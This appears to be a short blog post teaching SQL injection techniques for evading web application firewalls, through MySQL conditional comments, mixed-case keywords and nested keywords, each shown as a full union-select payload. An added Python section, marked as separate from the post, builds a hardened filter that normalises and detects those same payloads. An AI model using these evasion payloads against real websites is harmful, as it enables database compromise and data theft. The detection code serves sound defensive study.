Bypass Web Application Firewalls

Web application firewalls are designed to protect web applications from known attacks, such as SQL injection, that are commonly used to compromise websites. They do this by intercepting requests sent by clients and enforcing strict rules about their formatting and payload. Today we demonstrate some tricks to bypass a web application firewall (WAF).
SQLi

http://xyz.com/detail.php?id=44 union all select 1,2,3,4,5-- -

Bypassed SQLi

http://xyz.com/detail.php?id=44 /*!UNION*/+/*!ALL*/+/*!SELECT*/+1,2,3,4,5-- -

Here the keywords are wrapped in MySQL conditional comments (/*! ... */), which a WAF may treat as ordinary comments even though the database still executes their contents, and the spaces are replaced by + signs.
By Function Capitalization:-

Some web application firewalls filter only lowercase keywords, so we can easily bypass them by changing the case of the letters.

Actual query

http://xyz.com/detail.php?id=44 UNION SELECT 1,2,3,4,5--

Query to bypass the WAF

http://xyz.com/detail.php?id=-1 uniOn SeLeCt 1,2,3,4,5--
By Replaced Keywords:-

Some WAFs will strip certain keywords such as UNION, SELECT, ORDER BY, etc. from the request. This can be used to our advantage by nesting the filtered word inside a copy of itself, as in the query below: when the WAF removes the inner occurrence once, the surrounding characters join back into the original keyword.

Actual query

http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5--

Query to bypass the WAF

http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5-- -
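From the defender's side, all three tricks above (inline comments, mixed case, and nested keywords) only work against a filter that inspects the raw bytes once. The following Python example is added here and is not part of the original post: it contrasts a naive rule modelled on the weaknesses the post describes with a hardened check that normalises the query string (URL-decoding, unwrapping /*! ... */ comments, lowercasing) and then peels keywords repeatedly, judging the request at every round instead of forwarding a stripped copy. The function names, the keyword list and the sample query strings are assumptions constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical keyword list and pattern; a real ruleset is far larger.
STRIP_WORDS = ("union", "select", "order by")
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b")


def naive_waf_blocks(raw_query: str) -> bool:
    """Model of the weak rule the post describes: a case-sensitive,
    literal match on the raw query string. It never URL-decodes, never
    looks inside comments and never lowercases, so each trick on the
    page slips past it."""
    return "union select" in raw_query or "union all select" in raw_query


def normalize(raw_query: str) -> str:
    """Canonicalise the query string before inspecting it."""
    text = unquote_plus(raw_query)  # decode %XX escapes, '+' becomes a space
    # Keep the body of MySQL conditional comments /*! ... */ (optionally
    # prefixed with a version number) because the server executes it.
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)
    # Ordinary comments carry no SQL for the server, so drop them.
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text.lower()).strip()


def hardened_waf_blocks(raw_query: str, max_rounds: int = 5) -> bool:
    """Block if the normalised query contains UNION ... SELECT, either
    directly or after peeling nested keywords. Stripping is repeated
    until nothing changes and the text is checked at every round, so a
    keyword hidden inside a copy of itself is exposed rather than
    reassembled and forwarded."""
    text = normalize(raw_query)
    for _ in range(max_rounds):
        if UNION_SELECT.search(text):
            return True
        stripped = text
        for word in STRIP_WORDS:
            stripped = stripped.replace(word, "")
        stripped = re.sub(r"\s+", " ", stripped)
        if stripped == text:  # fixpoint reached, nothing left to peel
            return False
        text = stripped
    return True  # still changing after max_rounds: treat as evasive


if __name__ == "__main__":
    # Constructed sample query strings mirroring the post's three tricks.
    samples = [
        "id=44 union all select 1,2,3,4,5-- -",
        "id=44 /*!UNION*/+/*!ALL*/+/*!SELECT*/+1,2,3,4,5-- -",
        "id=-1 uniOn SeLeCt 1,2,3,4,5--",
        "id=-1 UNIunionON SEselectLECT 1,2,3,4,5-- -",
        "q=reunion selection",  # benign text that merely contains fragments
    ]
    for sample in samples:
        print(f"{sample!r}: naive={naive_waf_blocks(sample)} "
              f"hardened={hardened_waf_blocks(sample)}")
```

The design point is that keyword stripping is used only to reach a decision, never as a sanitiser whose output is forwarded to the application; the single-pass strip-and-forward behaviour is exactly what the nested-keyword trick exploits. Substring removal is deliberately aggressive, which is why the benign "reunion selection" sample is checked as well; a production WAF would score several such signals rather than block on one rule.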
We hope you enjoyed this trick!